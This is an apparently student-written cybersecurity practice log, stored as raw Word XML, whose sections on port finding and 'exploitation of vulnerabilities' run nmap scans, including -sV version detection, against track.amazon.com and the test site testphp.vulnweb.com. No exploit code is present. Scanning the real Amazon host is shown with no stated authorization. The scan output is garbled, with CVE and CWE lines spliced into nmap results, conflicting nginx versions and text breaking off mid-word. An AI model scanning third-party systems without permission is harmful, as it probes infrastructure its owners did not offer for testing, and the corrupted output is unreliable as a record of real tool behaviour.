          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>DAY -3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Finding ports on -  nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -1 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Open kali linux </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -2 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Open terminal </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -3 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nmap track.amazon.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Starting Nmap 7.94 (https://nmap.org ) at 2023-07-13 10:45 IST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Nmap scan report for track.amazon.com (44.215.131.30)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Host is up (0.23s latency).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>rDNS record for 44.215.131.30: ec2-44-215-131-30.compute-1.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Not shown: 998 filtered tcp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>PORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>80/tcp open http</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>443/tcp open https</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Nmap done: 1 IP address (1 host up) scanned in 19.92 seconds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -4 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">I got 2 open ports </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>80/tcp http</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>443/tcp https</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -5 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Using chat gpt or google i got this information about those 2 open ports </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>80 HTTP, 443 HTTPS, they are used by web servers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Can you hack something through port 80/443? It depends on the specific service that runs on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>those ports (which specific web server, i.e. nginx), and on the content which is provided by the web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>server. Usually it's latter which is vulnerable (sql injection, IDOR, look at OWASP top 10), even</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>though also the web server can be configured wrongly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">It is used </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Port 80 is used for unencrypted web traffic and port 443 is used for encrypted web traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>DAY -4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Exploitation of vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -1 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>testphp.vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-2 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">In terminal </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nmap testphp.vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Starting Nmap 7.94 ( https//nmap.org ) at 2023-07-14 13:50 IST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Nmap scan report for testphp.vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Host is up (0.28s latency).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CVSSV3.1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Not shown: 999 filtered tcp ports (no-response) CVE-ID: CVE-2022-417</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>PORT STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CWE-ID: CWE-125-Ouch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>80/tcp open http</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Exploit availability: No</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap done: 1 IP address (1 host up) scanned in 21.04 seconds </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step -3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Take ip address of domain and </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nmap -sV 44.228.249.3 -p 80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nginx 1.0.7-1.23.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>$ nmap -sV 44.228.249.3 -p 80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Starting Nmap 7.94 (https://nmap.org) at 2023-07-14 13:51 IST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ec2-44-228-249-3.us-west-2.compute.amazonaws.com (44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Nmap scan report for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Host is up (0.30s latency).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>PORT STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>80/tcp open http nginx 1.19.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>che 2.3 an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
